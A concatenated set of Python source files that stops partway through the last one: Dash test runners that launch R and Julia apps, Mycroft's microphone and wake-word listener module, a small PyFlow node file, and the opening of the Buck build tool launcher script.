shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
else:
logger.warning(
"RRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashr.run_server(app, cwd=os.path.dirname(__file__))"
)
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript -e 'source(\"{}\")'".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
class JuliaRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super().__init__(keep_open=keep_open, stop_timeout=stop_timeout)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app, start_timeout=30, cwd=None):
"""Start the server with subprocess and julia."""
if os.path.isfile(app) and os.path.exists(app):
# app is already a file in a dir - use that as cwd
if not cwd:
cwd = os.path.dirname(app)
logger.info("JuliaRunner inferred cwd from app path: %s", cwd)
else:
# app is a string chunk, we make a temporary folder to store app.jl
# and its relevant assets
self._tmp_app_path = os.path.join(
"/tmp" if not self.is_windows else os.getenv("TEMP"), uuid.uuid4().hex
)
try:
os.mkdir(self.tmp_app_path)
except OSError:
logger.exception("cannot make temporary folder %s", self.tmp_app_path)
path = os.path.join(self.tmp_app_path, "app.jl")
logger.info("JuliaRunner start => app is Julia code chunk")
logger.info("make a temporary Julia file for execution => %s", path)
logger.debug("content of the Dash.jl app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
# try to find the path to the calling script to use as cwd
if not cwd:
for entry in inspect.stack():
if "/dash/testing/" not in entry[1].replace("\\", "/"):
cwd = os.path.dirname(os.path.realpath(entry[1]))
logger.warning("get cwd from inspect => %s", cwd)
break
if cwd:
logger.info(
"JuliaRunner inferred cwd from the Python call stack: %s", cwd
)
# try copying all valid sub folders (i.e. assets) in cwd to tmp
# note that the R assets folder name can be any valid folder name
assets = [
os.path.join(cwd, _)
for _ in os.listdir(cwd)
if not _.startswith("__") and os.path.isdir(os.path.join(cwd, _))
]
for asset in assets:
target = os.path.join(self.tmp_app_path, os.path.basename(asset))
if os.path.exists(target):
logger.debug("delete existing target %s", target)
shutil.rmtree(target)
logger.debug("copying %s => %s", asset, self.tmp_app_path)
shutil.copytree(asset, target)
logger.debug("copied with %s", os.listdir(target))
else:
logger.warning(
"JuliaRunner found no cwd in the Python call stack. "
"You may wish to specify an explicit working directory "
"using something like: "
"dashjl.run_server(app, cwd=os.path.dirname(__file__))"
)
logger.info("Run Dash.jl app with julia => %s", app)
args = shlex.split(
"julia {}".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start Dash.jl process with %s", args)
try:
self.proc = subprocess.Popen( # pylint: disable=consider-using-with
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.tmp_app_path if self.tmp_app_path else cwd,
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=start_timeout)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
mic.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
from time import sleep, time as get_time
from collections import deque, namedtuple
from datetime import date, timedelta, datetime
import json
import os
from os.path import isdir, join
import pyaudio
import requests
import speech_recognition
from hashlib import md5
from io import BytesIO, StringIO
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from tempfile import gettempdir
from threading import Thread, Lock
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
from mycroft.util.log import LOG
from .data_structures import RollingMean, CyclicAudioBuffer
WakeWordData = namedtuple('WakeWordData',
['audio', 'found', 'stopped', 'end_audio'])
class MutableStream:
def __init__(self, wrapped_stream, format, muted=False):
assert wrapped_stream is not None
self.wrapped_stream = wrapped_stream
self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
self.muted_buffer = b''.join([b'\x00' * self.SAMPLE_WIDTH])
self.read_lock = Lock()
self.muted = muted
if muted:
self.mute()
def mute(self):
"""Stop the stream and set the muted flag."""
with self.read_lock:
self.muted = True
self.wrapped_stream.stop_stream()
def unmute(self):
"""Start the stream and clear the muted flag."""
with self.read_lock:
self.muted = False
self.wrapped_stream.start_stream()
def read(self, size, of_exc=False):
"""Read data from stream.
Args:
size (int): Number of bytes to read
of_exc (bool): flag determining if the audio producer thread
should throw IOError at overflows.
Returns:
(bytes) Data read from device
"""
frames = deque()
remaining = size
with self.read_lock:
while remaining > 0:
# If muted during read return empty buffer. This ensures no
# reads occur while the stream is stopped
if self.muted:
return self.muted_buffer
to_read = min(self.wrapped_stream.get_read_available(),
remaining)
if to_read <= 0:
sleep(.01)
continue
result = self.wrapped_stream.read(to_read,
exception_on_overflow=of_exc)
frames.append(result)
remaining -= to_read
input_latency = self.wrapped_stream.get_input_latency()
if input_latency > 0.2:
LOG.warning("High input latency: %f" % input_latency)
audio = b"".join(list(frames))
return audio
def close(self):
self.wrapped_stream.close()
self.wrapped_stream = None
def is_stopped(self):
try:
return self.wrapped_stream.is_stopped()
except Exception as e:
LOG.error(repr(e))
return True # Assume the stream has been closed and thusly stopped
def stop_stream(self):
return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
mute=False):
Microphone.__init__(self, device_index=device_index,
sample_rate=sample_rate, chunk_size=chunk_size)
self.muted = False
if mute:
self.mute()
def __enter__(self):
return self._start()
def _start(self):
"""Open the selected device and setup the stream."""
assert self.stream is None, \
"This audio source is already inside a context manager"
self.audio = pyaudio.PyAudio()
self.stream = MutableStream(self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE,
frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
), self.format, self.muted)
return self
def __exit__(self, exc_type, exc_value, traceback):
return self._stop()
def _stop(self):
"""Stop and close an open stream."""
try:
if not self.stream.is_stopped():
self.stream.stop_stream()
self.stream.close()
except Exception:
LOG.exception('Failed to stop mic input stream')
# Let's pretend nothing is wrong...
self.stream = None
self.audio.terminate()
def restart(self):
"""Shutdown input device and restart."""
self._stop()
self._start()
def mute(self):
self.muted = True
if self.stream:
self.stream.mute()
def unmute(self):
self.muted = False
if self.stream:
self.stream.unmute()
def is_muted(self):
return self.muted
def duration_to_bytes(self, sec):
"""Converts a duration in seconds to number of recorded bytes.
Args:
sec: number of seconds
Returns:
(int) equivalent number of bytes recorded by this Mic
"""
return int(sec * self.SAMPLE_RATE) * self.SAMPLE_WIDTH
def get_silence(num_bytes):
return b'\0' * num_bytes
class NoiseTracker:
"""Noise tracker, used to deterimine if an audio utterance is complete.
The current implementation expects a number of loud chunks (not necessary
in one continous sequence) followed by a short period of continous quiet
audio data to be considered complete.
Args:
minimum (int): lower noise level will be threshold for "quiet" level
maximum (int): ceiling of noise level
sec_per_buffer (float): the length of each buffer used when updating
the tracker
loud_time_limit (float): time in seconds of low noise to be considered
a complete sentence
silence_time_limit (float): time limit for silence to abort sentence
silence_after_loud (float): time of silence to finalize the sentence.
default 0.25 seconds.
"""
def __init__(self, minimum, maximum, sec_per_buffer, loud_time_limit,
silence_time_limit, silence_after_loud_time=0.25):
self.min_level = minimum
self.max_level = maximum
self.sec_per_buffer = sec_per_buffer
self.num_loud_chunks = 0
self.level = 0
# Smallest number of loud chunks required to return loud enough
self.min_loud_chunks = int(loud_time_limit / sec_per_buffer)
self.max_silence_duration = silence_time_limit
self.silence_duration = 0
# time of quite period after long enough loud data to consider the
# sentence complete
self.silence_after_loud = silence_after_loud_time
# Constants
self.increase_multiplier = 200
self.decrease_multiplier = 100
def _increase_noise(self):
"""Bumps the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level < self.max_level:
self.level += self.increase_multiplier * self.sec_per_buffer
def _decrease_noise(self):
"""Decrease the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level > self.min_level:
self.level -= self.decrease_multiplier * self.sec_per_buffer
def update(self, is_loud):
"""Update the tracking. with either a loud chunk or a quiet chunk.
Args:
is_loud: True if a loud chunk should be registered
False if a quiet chunk should be registered
"""
if is_loud:
self._increase_noise()
self.num_loud_chunks += 1
else:
self._decrease_noise()
# Update duration of energy under the threshold level
if self._quiet_enough():
self.silence_duration += self.sec_per_buffer
else: # Reset silence duration
self.silence_duration = 0
def _loud_enough(self):
"""Check if the noise loudness criteria is fulfilled.
The noise is considered loud enough if it's been over the threshold
for a certain number of chunks (accumulated, not in a row).
"""
return self.num_loud_chunks > self.min_loud_chunks
def _quiet_enough(self):
"""Check if the noise quietness criteria is fulfilled.
The quiet level is instant and will return True if the level is lower
or equal to the minimum noise level.
"""
return self.level <= self.min_level
def recording_complete(self):
"""Has the end creteria for the recording been met.
If the noise level has decresed from a loud level to a low level
the user has stopped speaking.
Alternatively if a lot of silence was recorded without detecting
a loud enough phrase.
"""
too_much_silence = (self.silence_duration > self.max_silence_duration)
if too_much_silence:
LOG.debug('Too much silence recorded without start of sentence '
'detected')
return ((self._quiet_enough() and
self.silence_duration > self.silence_after_loud) and
(self._loud_enough() or too_much_silence))
class ResponsiveRecognizer(speech_recognition.Recognizer):
# Padding of silence when feeding to pocketsphinx
SILENCE_SEC = 0.01
# The minimum seconds of noise before a
# phrase can be considered complete
MIN_LOUD_SEC_PER_PHRASE = 0.5
# The minimum seconds of silence required at the end
# before a phrase will be considered complete
MIN_SILENCE_AT_END = 0.25
# Time between pocketsphinx checks for the wake word
SEC_BETWEEN_WW_CHECKS = 0.2
def __init__(self, wake_word_recognizer, watchdog=None):
self._watchdog = watchdog or (lambda: None) # Default to dummy func
self.config = Configuration.get()
listener_config = self.config.get('listener')
self.upload_url = listener_config['wake_word_upload']['url']
self.upload_disabled = listener_config['wake_word_upload']['disable']
self.wake_word_name = wake_word_recognizer.key_phrase
self.overflow_exc = listener_config.get('overflow_exception', False)
super().__init__()
self.wake_word_recognizer = wake_word_recognizer
self.audio = pyaudio.PyAudio()
self.multiplier = listener_config.get('multiplier')
self.energy_ratio = listener_config.get('energy_ratio')
# Check the config for the flag to save wake words, utterances
# and for a path under which to save them
self.save_utterances = listener_config.get('save_utterances', False)
self.save_wake_words = listener_config.get('record_wake_words', False)
self.save_path = listener_config.get('save_path', gettempdir())
self.saved_wake_words_dir = join(self.save_path, 'mycroft_wake_words')
if self.save_wake_words and not isdir(self.saved_wake_words_dir):
os.mkdir(self.saved_wake_words_dir)
self.saved_utterances_dir = join(self.save_path, 'mycroft_utterances')
if self.save_utterances and not isdir(self.saved_utterances_dir):
os.mkdir(self.saved_utterances_dir)
self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
# Signal statuses
self._stop_signaled = False
self._listen_triggered = False
self._account_id = None
# The maximum seconds a phrase can be recorded,
# provided there is noise the entire time
self.recording_timeout = listener_config.get('recording_timeout',
10.0)
# The maximum time it will continue to record silence
# when not enough noise has been detected
self.recording_timeout_with_silence = listener_config.get(
'recording_timeout_with_silence', 3.0)
@property
def account_id(self):
"""Fetch account from backend when needed.
If an error occurs it's handled and a temporary value is returned.
When a value is received it will be cached until next start.
"""
if not self._account_id:
try:
self._account_id = DeviceApi().get()['user']['uuid']
except (requests.RequestException, AttributeError):
pass # These are expected and won't be reported
except Exception as e:
LOG.debug('Unhandled exception while determining device_id, '
'Error: {}'.format(repr(e)))
return self._account_id or '0'
def record_sound_chunk(self, source):
return source.stream.read(source.CHUNK, self.overflow_exc)
@staticmethod
def calc_energy(sound_chunk, sample_width):
return audioop.rms(sound_chunk, sample_width)
def _record_phrase(
self,
source,
sec_per_buffer,
stream=None,
ww_frames=None
):
"""Record an entire spoken phrase.
Essentially, this code waits for a period of silence and then returns
the audio. If silence isn't detected, it will terminate and return
a buffer of self.recording_timeout duration.
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded.
ww_frames (deque): Frames of audio data from the last part of wake
word detection.
Returns:
bytearray: complete audio buffer recorded, including any
silence at the end of the user's utterance
"""
noise_tracker = NoiseTracker(0, 25, sec_per_buffer,
self.MIN_LOUD_SEC_PER_PHRASE,
self.recording_timeout_with_silence)
# Maximum number of chunks to record before timing out
max_chunks = int(self.recording_timeout / sec_per_buffer)
num_chunks = 0
# bytearray to store audio in, initialized with a single sample of
# silence.
byte_data = get_silence(source.SAMPLE_WIDTH)
if stream:
stream.stream_start()
phrase_complete = False
while num_chunks < max_chunks and not phrase_complete:
if ww_frames:
chunk = ww_frames.popleft()
else:
chunk = self.record_sound_chunk(source)
byte_data += chunk
num_chunks += 1
if stream:
stream.stream_chunk(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
test_threshold = self.energy_threshold * self.multiplier
is_loud = energy > test_threshold
noise_tracker.update(is_loud)
if not is_loud:
self._adjust_threshold(energy, sec_per_buffer)
# The phrase is complete if the noise_tracker end of sentence
# criteria is met or if the top-button is pressed
phrase_complete = (noise_tracker.recording_complete() or
check_for_signal('buttonPress'))
# Periodically write the energy level to the mic level file.
if num_chunks % 10 == 0:
self._watchdog()
self.write_mic_level(energy, source)
return byte_data
def write_mic_level(self, energy, source):
with open(self.mic_level_file, 'w') as f:
f.write('Energy: cur={} thresh={:.3f} muted={}'.format(
energy,
self.energy_threshold,
int(source.muted)
)
)
def _skip_wake_word(self):
"""Check if told programatically to skip the wake word
For example when we are in a dialog with the user.
"""
if self._listen_triggered:
return True
# Pressing the Mark 1 button can start recording (unless
# it is being used to mean 'stop' instead)
if check_for_signal('buttonPress', 1):
# give other processes time to consume this signal if
# it was meant to be a 'stop'
sleep(0.25)
if check_for_signal('buttonPress'):
# Signal is still here, assume it was intended to
# begin recording
LOG.debug("Button Pressed, wakeword not needed")
return True
return False
def stop(self):
"""Signal stop and exit waiting state."""
self._stop_signaled = True
def _compile_metadata(self):
ww_module = self.wake_word_recognizer.__class__.__name__
if ww_module == 'PreciseHotword':
model_path = self.wake_word_recognizer.precise_model
with open(model_path, 'rb') as f:
model_hash = md5(f.read()).hexdigest()
else:
model_hash = '0'
return {
'name': self.wake_word_name.replace(' ', '-'),
'engine': md5(ww_module.encode('utf-8')).hexdigest(),
'time': str(int(1000 * get_time())),
'sessionId': SessionManager.get().session_id,
'accountId': self.account_id,
'model': str(model_hash)
}
def trigger_listen(self):
"""Externally trigger listening."""
LOG.debug('Listen triggered from external source.')
self._listen_triggered = True
def _upload_wakeword(self, audio, metadata):
"""Upload the wakeword in a background thread."""
LOG.debug(
"Wakeword uploading has been disabled. The API endpoint used in "
"Mycroft-core v20.2 and below has been deprecated. To contribute "
"new wakeword samples please upgrade to v20.8 or above."
)
# def upload(audio, metadata):
# requests.post(self.upload_url,
# files={'audio': BytesIO(audio.get_wav_data()),
# 'metadata': StringIO(json.dumps(metadata))})
# Thread(target=upload, daemon=True, args=(audio, metadata)).start()
def _send_wakeword_info(self, emitter):
"""Send messagebus message indicating that a wakeword was received.
Args:
emitter: bus emitter to send information on.
"""
SessionManager.touch()
payload = {'utterance': self.wake_word_name,
'session': SessionManager.get().session_id}
emitter.emit("recognizer_loop:wakeword", payload)
def _write_wakeword_to_disk(self, audio, metadata):
"""Write wakeword to disk.
Args:
audio: Audio data to write
metadata: List of metadata about the captured wakeword
"""
filename = join(self.saved_wake_words_dir,
'_'.join(str(metadata[k]) for k in sorted(metadata)) +
'.wav')
with open(filename, 'wb') as f:
f.write(audio.get_wav_data())
def _handle_wakeword_found(self, audio_data, source):
"""Perform actions to be triggered after a wakeword is found.
This includes: emit event on messagebus that a wakeword is heard,
store wakeword to disk if configured and sending the wakeword data
to the cloud in case the user has opted into the data sharing.
"""
# Save and upload positive wake words as appropriate
upload_allowed = (self.config['opt_in'] and not self.upload_disabled)
if (self.save_wake_words or upload_allowed):
audio = self._create_audio_data(audio_data, source)
metadata = self._compile_metadata()
if self.save_wake_words:
# Save wake word locally
self._write_wakeword_to_disk(audio, metadata)
# Upload wake word for opt_in people
if upload_allowed:
self._upload_wakeword(audio, metadata)
def _wait_until_wake_word(self, source, sec_per_buffer, emitter):
"""Listen continuously on source until a wake word is spoken
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
"""
#noise_tracker = NoiseTracker(0, 25, sec_per_buffer, self.MIN_LOUD_SEC_PER_PHRASE, self.recording_timeout_with_silence)
# The maximum audio in seconds to keep for transcribing a phrase
# The wake word must fit in this time
ww_duration = self.wake_word_recognizer.expected_duration
ww_test_duration = max(3, ww_duration)
mic_write_counter = 0
num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
source.SAMPLE_WIDTH)
silence = get_silence(num_silent_bytes)
# Max bytes for byte_data before audio is removed from the front
max_size = source.duration_to_bytes(ww_duration)
test_size = source.duration_to_bytes(ww_test_duration)
audio_buffer = CyclicAudioBuffer(max_size, silence)
buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
buffers_since_check = 0.0
# Rolling buffer to track the audio energy (loudness) heard on
# the source recently. An average audio energy is maintained
# based on these levels.
average_samples = int(5 / sec_per_buffer) # average over last 5 secs
audio_mean = RollingMean(average_samples)
# These are frames immediately after wake word is detected
# that we want to keep to send to STT
ww_frames = deque(maxlen=35)
energy = -1
said_wake_word = False
audio_data = None
noise_timer = datetime.now()
while energy < max(self.energy_threshold * 3, 200):
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
current_time = datetime.now()
if audio_mean.value > 1000 and current_time > timedelta(seconds=5) + noise_timer:
noise_timer = current_time
emitter.emit("energy_level:too_high")
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
counter = 0
while (not said_wake_word and not self._stop_signaled and
not self._skip_wake_word() and counter < 35):
counter += 1
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
current_time = datetime.now()
if audio_mean.value > 1000 and current_time > timedelta(seconds=5) + noise_timer:
noise_timer = current_time
emitter.emit("energy_level:too_high")
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
self._listen_triggered = False
return WakeWordData(audio_data, said_wake_word,
self._stop_signaled, ww_frames)
@staticmethod
def _create_audio_data(raw_data, source):
"""
Constructs an AudioData instance with the same parameters
as the source and the specified frame_data
"""
return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def mute_and_confirm_listening(self, source):
audio_file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if audio_file:
source.mute()
play_wav(audio_file).wait()
source.unmute()
return True
else:
return False
def listen(self, source, emitter, stream=None):
"""Listens for chunks of audio that Mycroft should perform STT on.
This will listen continuously for a wake-up-word, then return the
audio chunk containing the spoken phrase that comes immediately
afterwards.
Args:
source (AudioSource): Source producing the audio chunks
emitter (EventEmitter): Emitter for notifications of when recording
begins and ends.
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded
Returns:
AudioData: audio with the user's utterance, minus the wake-up-word
"""
assert isinstance(source, AudioSource), "Source must be an AudioSource"
# bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
# Every time a new 'listen()' request begins, reset the threshold
# used for silence detection. This is as good of a reset point as
# any, as we expect the user and Mycroft to not be talking.
# NOTE: adjust_for_ambient_noise() doc claims it will stop early if
# speech is detected, but there is no code to actually do that.
self.adjust_for_ambient_noise(source, 1.0)
LOG.debug("Waiting for wake word...")
ww_data = self._wait_until_wake_word(source, sec_per_buffer, emitter)
#ww_frames = None
if ww_data.found:
# If the wakeword was heard send it
self._send_wakeword_info(emitter)
self._handle_wakeword_found(ww_data.audio, source)
ww_frames = ww_data.end_audio
if ww_data.stopped:
# If the waiting returned from a stop signal
return
LOG.debug("Recording...")
# If enabled, play a wave file with a short sound to audibly
# indicate recording has begun.
if ww_data.found and self.config.get('confirm_listening'):
if self.mute_and_confirm_listening(source):
# Clear frames from wakeword detctions since they're
# irrelevant after mute - play wav - unmute sequence
ww_frames = None
# Notify system of recording start
emitter.emit("recognizer_loop:record_begin")
frame_data = self._record_phrase(
source,
sec_per_buffer,
stream,
ww_frames
)
audio_data = self._create_audio_data(frame_data, source)
emitter.emit("recognizer_loop:record_end")
if self.save_utterances:
LOG.info("recording utterance")
stamp = str(datetime.datetime.now())
filename = "/{}/{}.wav".format(
self.saved_utterances_dir,
stamp
)
with open(filename, 'wb') as filea:
filea.write(audio_data.get_wav_data())
LOG.debug("Thinking...")
return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
|
ProcessObj.py
|
from PyFlow.Core import NodeBase
from PyFlow.Core.NodeBase import NodePinsSuggestionsHelper
from PyFlow.Core.Common import *
import threading
class AnObject(NodeBase):
def __init__(self, name):
super(AnObject, self).__init__(name)
self.inExec = self.createInputPin("Start", 'ExecPin', None, self.start)
self.inExec = self.createInputPin("Stop", 'ExecPin', None, self.stop)
self.entity = self.createInputPin('WordsInput', 'StringPin', defaultValue="Speaker Loaded!",structure=StructureType.Multi)
self.brunning=False
thr=threading.Thread(target=self.work)
thr.start()
@staticmethod
def pinTypeHints():
helper = NodePinsSuggestionsHelper()
return helper
@staticmethod
def category():
return 'Tests'
def start(self, *args, **kwargs):
self.brunning=True
pass
def stop(self, *args, **kwargs):
pass
self.brunning=False
def work(self, *args, **kwargs):
while True:
time.sleep(1)
if self.brunning == False:
continue
if self.entity.getData() !="":
print("your object is working ...")
print("text is -> {}".format(self.entity.getData()))
self.entity.setData("")
class ProcessObj(NodeBase):
def __init__(self, name):
super(ProcessObj, self).__init__(name)
self.inExec = self.createInputPin(DEFAULT_IN_EXEC_NAME, 'ExecPin', None, self.work)
self.entity = self.createInputPin('entity', 'AnyPin', structure=StructureType.Multi)
self.entity.enableOptions(PinOptions.AllowAny)
self.outExec = self.createOutputPin(DEFAULT_OUT_EXEC_NAME, 'ExecPin')
self.WordsToSay = self.createOutputPin("WordsToSay",'StringPin')
@staticmethod
def pinTypeHints():
helper = NodePinsSuggestionsHelper()
return helper
@staticmethod
def category():
return 'Tests'
def work(self, *args, **kwargs):
print("processObj Compute..")
# print(self.entity.getData())
# obj=self.entity.getData()
# obj.set_text("Pick a Bolt")
self.WordsToSay.setData("Pick a Bolt")
|
buck.py
|
#!/usr/bin/env python
from __future__ import print_function
import errno
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
import uuid
import zipfile
from multiprocessing import Queue
from subprocess import check_output
from buck_logging import setup_logging
from buck_project import BuckProject, NoBuckConfigFoundException
from buck_tool import (
BuckDaemonErrorException,
BuckStatusReporter,
ExecuteTarget,
get_java_path,
install_signal_handlers,
)
from subprocutils import propagate_failure
from tracing import Tracing
class ExitCode(object):
"""Python equivalent of com.facebook.buck.util.ExitCode"""
SUCCESS = 0
COMMANDLINE_ERROR = 3
FATAL_GENERIC = 10
FATAL_BOOTSTRAP = 11
FATAL_IO = 13
FATAL_DISK_FULL = 14
SIGNAL_INTERRUPT = 130
SIGNAL_PIPE = 141
if sys.version_info < (2, 7):
import platform
print(
(
"Buck requires at least version 2.7 of Python, but you are using {}."
"\nPlease follow https://buckbuild.com/setup/getting_started.html "
+ "to properly setup your development environment."
).format(platform.version())
)
sys.exit(ExitCode.FATAL_BOOTSTRAP)
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
REQUIRED_JAVA_VERSION = "8"
# Kill all buck processes
def killall_buck(reporter):
# Linux or macOS
if os.name != "posix":
message = "killall is not implemented on: " + os.name
logging.error(message)
reporter.status_message = message
return ExitCode.COMMANDLINE_ERROR
for line in os.popen("jps -l"):
split = line.split()
if len(split) == 1:
# Java processes which are launched not as `java Main`
# (e. g. `idea`) are shown with only PID without
# main class name.
continue
if len(split) != 2:
raise Exception("cannot parse a line in jps -l outout: " + repr(line))
pid = int(split[0])
name = split[1]
if name != "com.facebook.buck.cli.bootstrapper.ClassLoaderBootstrapper":
continue
os.kill(pid, signal.SIGTERM)
# TODO(buck_team) clean .buckd directories
return ExitCode.SUCCESS
def _get_java_version(java_path):
"""
Returns a Java version string (e.g. "7", "8").
Information is provided by java tool and parsing is based on
http://www.oracle.com/technetwork/java/javase/versioning-naming-139433.html
"""
java_version = check_output([java_path, "-version"], stderr=subprocess.STDOUT)
# extract java version from a string like 'java version "1.8.0_144"'
match = re.search('java version "(?P<version>.+)"', java_version)
if not match:
return None
pieces = match.group("version").split(".")
if pieces[0] != "1":
# versions starting at 9 look like "9.0.4"
return pieces[0]
# versions <9 look like "1.8.0_144"
return pieces[1]
def _try_to_verify_java_version(java_version_status_queue):
"""
Best effort check to make sure users have required Java version installed.
"""
java_path = get_java_path()
warning = None
try:
java_version = _get_java_version(java_path)
if java_version and java_version != REQUIRED_JAVA_VERSION:
warning = "You're using Java {}, but Buck requires Java {}.\nPlease follow \
https://buckbuild.com/setup/getting_started.html \
to properly setup your local environment and avoid build issues.".format(
java_version, REQUIRED_JAVA_VERSION
)
except:
# checking Java version is brittle and as such is best effort
warning = "Cannot verify that installed Java version at '{}' \
is correct.".format(
java_path
)
java_version_status_queue.put(warning)
def _try_to_verify_java_version_off_thread(java_version_status_queue):
""" Attempts to validate the java version off main execution thread.
The reason for this is to speed up the start-up time for the buck process.
testing has shown that starting java process is rather expensive and on local tests,
this optimization has reduced startup time of 'buck run' from 673 ms to 520 ms. """
verify_java_version_thread = threading.Thread(
target=_try_to_verify_java_version, args=(java_version_status_queue,)
)
verify_java_version_thread.daemon = True
verify_java_version_thread.start()
def _emit_java_version_warnings_if_any(java_version_status_queue):
""" Emits java_version warnings that got posted in the java_version_status_queue
queus from the java version verification thread.
There are 2 cases where we need to take special care for.
1. The main thread finishes before the main thread gets here before the version testing
thread is done. In such case we wait for 50 ms. This should pretty much never happen,
except in cases where buck deployment or the VM is really badly misconfigured.
2. The java version thread never testing returns. This can happen if the process that is
called java is hanging for some reason. This is also not a normal case, and in such case
we will wait for 50 ms and if still no response, ignore the error."""
if java_version_status_queue.empty():
time.sleep(0.05)
if not java_version_status_queue.empty():
warning = java_version_status_queue.get()
if warning is not None:
logging.warning(warning)
def main(argv, reporter):
java_version_status_queue = Queue(maxsize=1)
_try_to_verify_java_version_off_thread(java_version_status_queue)
def get_repo(p):
# Try to detect if we're running a PEX by checking if we were invoked
# via a zip file.
if zipfile.is_zipfile(argv[0]):
from buck_package import BuckPackage
return BuckPackage(p, reporter)
else:
from buck_repo import BuckRepo
return BuckRepo(THIS_DIR, p, reporter)
# If 'killall' is the second argument, shut down all the buckd processes
if sys.argv[1:] == ["killall"]:
return killall_buck(reporter)
install_signal_handlers()
try:
tracing_dir = None
build_id = os.environ.get("BUCK_BUILD_ID", str(uuid.uuid4()))
reporter.build_id = build_id
with Tracing("main"):
with BuckProject.from_current_dir() as project:
tracing_dir = os.path.join(project.get_buck_out_log_dir(), "traces")
with get_repo(project) as buck_repo:
# If 'kill' is the second argument, shut down the buckd
# process
if sys.argv[1:] == ["kill"]:
buck_repo.kill_buckd()
return ExitCode.SUCCESS
return buck_repo.launch_buck(build_id)
finally:
if tracing_dir:
Tracing.write_to_dir(tracing_dir, build_id)
_emit_java_version_warnings_if_any(java_version_status_queue)
if __name__ == "__main__":
exit_code = ExitCode.SUCCESS
reporter = BuckStatusReporter(sys.argv)
fn_exec = None
